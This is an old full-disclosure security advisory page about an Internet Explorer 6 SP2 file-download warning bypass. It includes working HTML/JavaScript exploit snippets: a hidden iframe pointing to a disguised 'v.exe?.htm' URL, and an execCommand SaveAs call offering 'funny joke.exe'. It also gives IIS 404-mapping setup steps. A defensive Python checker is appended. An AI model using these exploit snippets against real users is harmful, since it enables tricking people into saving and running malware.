Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning bypass. This unpatched flaw may be exploited to download a malicious executable file masquerading as an HTML file. Full exploit details are given. Originally posted on k-otik.
5cf54bfc3b98194b62e01d674a293f76a8b55e5d1942178a1fcfe020e729bc73
<HTML><HEAD><TITLE>Internet Explorer 6.0 SP2 File Download Security
Warning Bypass Exploit</TITLE>
<BODY id=all text=#000000 vLink=#000020 aLink=#000020 link=#000020
bgColor=#e9e9e9 topMargin=10 marginheight="10" marginwidth="10">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="74%" id="AutoNumber4">
<tr>
<td width="100%">
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber5">
<tr>
<td width="100%">
<p align="center"><b><font size="1" face="Verdana">Internet
Explorer 6.0 SP2 File Download Security Warning Bypass Exploit</font></b></td>
</tr>
</table><div align="center">
</div>
<font size="1"></font>
<div align="justify">
<pre><font face="Verdana" size="1">Microsoft Internet Explorer (including IE for Windows XP SP2) is reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious executable file masquerading as an HTML file.
</font><font color="#FF0000" face="Verdana" size="1">Secunia did not release the technical details (aka Security by Obscurity) </font><font size="1" face="Verdana" color="#FF0000">thus</font><font color="#FF0000" face="Verdana" size="1"> we publish this page (aka Full Disclosure)</font></pre>
</div>
<pre><font face="Verdana" size="1"><b><u>Solution</u></b>
[EN] Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]
[FR] Disable Active Scripting and the "Hide extensions for known file types" option [Control Panel -> Folder Options
-> View]
<u>Credits</u> : go to cyber flash
<u>How does it work ? A.K.A Exploit
</u>The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:</font></pre>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font face="Verdana"><font color="#000080" size="1">&lt;html&gt;<br>
&lt;body&gt;<br>
&lt;iframe src</font><font color="#345487" size="1">='http://domain.com/v.exe?.htm'
</font><font color="#000080" size="1">name="NotFound" width="0" height="0"&gt;&lt;/iframe&gt;Click<br>
&lt;a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');"&gt;<br>
here&lt;/a&gt;.<br>
&lt;/body&gt;<br>
&lt;/html&gt;</font></font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Also, here's an example that
requires modifying the IIS Error Mapping Properties (see below):</font></p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing="0" cellPadding="0" width="75%" bgColor="#e6e6e6" border="1" height="96">
<tr>
<td noWrap bordercolor="#000000" height="94">
<font color="#000080" size="1" face="Verdana">&lt;html&gt;<br>
&lt;body&gt;<br>
&lt;iframe src='vengy404.htm' name="NotFound" width="0" height="0"&gt;&lt;/iframe&gt;Click<br>
&lt;a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');"&gt;<br>
here&lt;/a&gt;.<br>
&lt;/body&gt;<br>
&lt;/html&gt;</font></td>
</tr>
</table>
<p><font size="1" face="Verdana">Steps to configure IIS:</font></p>
<p><font size="1" face="Verdana">Launch Internet Information
Services manager.<br>
Under the 'Custom Errors' tab, modify the Error Mapping Properties
as follows:</font></p>
<ol type="i">
<li><font size="1" face="Verdana">Error Code: 404 </font></li>
<li><font size="1" face="Verdana">Default Text: Not Found </font>
</li>
<li><font size="1" face="Verdana">Message Type: URL </font></li>
<li><font size="1" face="Verdana">URL: /v.exe (name of the
executable)</font></li>
</ol>
<p><font size="1" face="Verdana">Within the HTML page, insert an
IFRAME as follows:</font></p>
<p><font color="#000080" size="1" face="Verdana">&lt;iframe src='vengy404.htm' name="NotFound" width="0" height="0"&gt;&lt;/iframe&gt;</font></p>
<p><font size="1" face="Verdana">The file 'vengy404.htm'
intentionally doesn't exist on the server, so requesting it triggers the 404
error mapping defined above. The JavaScript code below then
references the stealthy v.exe data loaded in the frame 'NotFound', which
is offered under the name 'funny joke.exe' when the user is prompted to save the file:</font></p>
<p><font color="#000080" size="1" face="Verdana">javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');</font><font face="Verdana" size="1"><br>
<br>
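Added example (not part of the original advisory): a gateway-side check, in Python, that flags the two delivery variants described above by comparing what a URL appears to be with what is actually served. The function name check_response, the extension lists and the example.test URLs are assumptions; the sample responses are constructed.<br>
<br>

```python
from urllib.parse import urlsplit

# Assumed extension lists; tune them for the environment being monitored.
EXEC_EXT = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}
PAGE_EXT = {".htm", ".html"}


def _ext(text):
    """Lower-cased extension of the last '/'-separated component of text."""
    name = text.rsplit("/", 1)[-1]
    dot = name.rfind(".")
    return name[dot:].lower() if dot != -1 else ""


def check_response(url, body):
    """Return findings for one fetched URL and the first bytes of its body."""
    parts = urlsplit(url)
    path_ext = _ext(parts.path)
    # What a user or a naive filter sees: the extension at the very end of the URL.
    apparent_ext = _ext(parts.query) if parts.query else path_ext
    is_pe = body[:2] == b"MZ"  # DOS/PE executables start with "MZ"
    findings = []
    # Variant 1 (v.exe?.htm): the resource is executable, the URL tail says page.
    if path_ext in EXEC_EXT and apparent_ext in PAGE_EXT:
        findings.append("executable path disguised by query suffix")
    # Variant 2: a page URL answered with executable bytes, for example
    # through a custom 404 mapping.
    if path_ext in PAGE_EXT and is_pe:
        findings.append("page URL served executable content")
    return findings


# Constructed sample responses: (URL, first bytes of the response body).
SAMPLES = [
    ("http://domain.com/v.exe?.htm", b"MZ\x90\x00"),
    ("http://example.test/vengy404.htm", b"MZ\x90\x00"),
    ("http://example.test/index.htm", b"<html>"),
    ("http://example.test/setup.exe", b"MZ\x90\x00"),
]

if __name__ == "__main__":
    for url, body in SAMPLES:
        print(url, check_response(url, body) or "ok")
```

An ordinary executable download such as setup.exe is not flagged, because its URL does not pretend to be a page.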